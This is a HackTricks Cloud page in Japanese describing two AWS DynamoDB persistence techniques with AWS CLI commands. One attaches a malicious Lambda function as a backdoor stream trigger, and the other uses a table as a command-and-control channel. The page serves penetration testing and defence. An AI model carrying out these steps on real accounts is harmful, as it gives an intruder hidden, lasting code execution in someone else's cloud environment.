Japanese - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - DynamoDB Persistence

HackTricksをサポートする

DynamoDB

詳細情報はこちらを参照:

AWS - DynamoDB Enum

DynamoDB Triggers with Lambda Backdoor

DynamoDBトリガーを使用して、攻撃者はテーブルに悪意のあるLambda関数を関連付けることでステルスバックドアを作成できます。アイテムが追加、変更、または削除されたときにLambda関数がトリガーされ、攻撃者はAWSアカウント内で任意のコードを実行することができます。

# Create a malicious Lambda function
aws lambda create-function \
--function-name MaliciousFunction \
--runtime nodejs14.x \
--role <LAMBDA_ROLE_ARN> \
--handler index.handler \
--zip-file fileb://malicious_function.zip \
--region <region>

# Associate the Lambda function with the DynamoDB table as a trigger
aws dynamodbstreams describe-stream \
--table-name TargetTable \
--region <region>

# Note the "StreamArn" from the output
aws lambda create-event-source-mapping \
--function-name MaliciousFunction \
--event-source <STREAM_ARN> \
--region <region>

永続性を維持するために、攻撃者はDynamoDBテーブル内のアイテムを作成または変更し、悪意のあるLambda関数をトリガーすることができます。これにより、攻撃者はLambda関数と直接対話することなく、AWSアカウント内でコードを実行することができます。

DynamoDBをC2チャネルとして使用

攻撃者は、DynamoDBテーブルをcommand and control (C2) チャネルとして使用し、コマンドを含むアイテムを作成し、侵害されたインスタンスやLambda関数を使用してこれらのコマンドを取得および実行することができます。

# Create a DynamoDB table for C2
aws dynamodb create-table \
--table-name C2Table \
--attribute-definitions AttributeName=CommandId,AttributeType=S \
--key-schema AttributeName=CommandId,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--region <region>

# Insert a command into the table
aws dynamodb put-item \
--table-name C2Table \
--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
--region <region>

侵害されたインスタンスやLambda関数は、定期的にC2テーブルをチェックして新しいコマンドを取得し、それを実行し、必要に応じて結果をテーブルに報告することができます。これにより、攻撃者は侵害されたリソースに対する持続性と制御を維持することができます。

HackTricksをサポートする
PreviousAWS - Cognito PersistenceNextAWS - EC2 Persistence

Last updated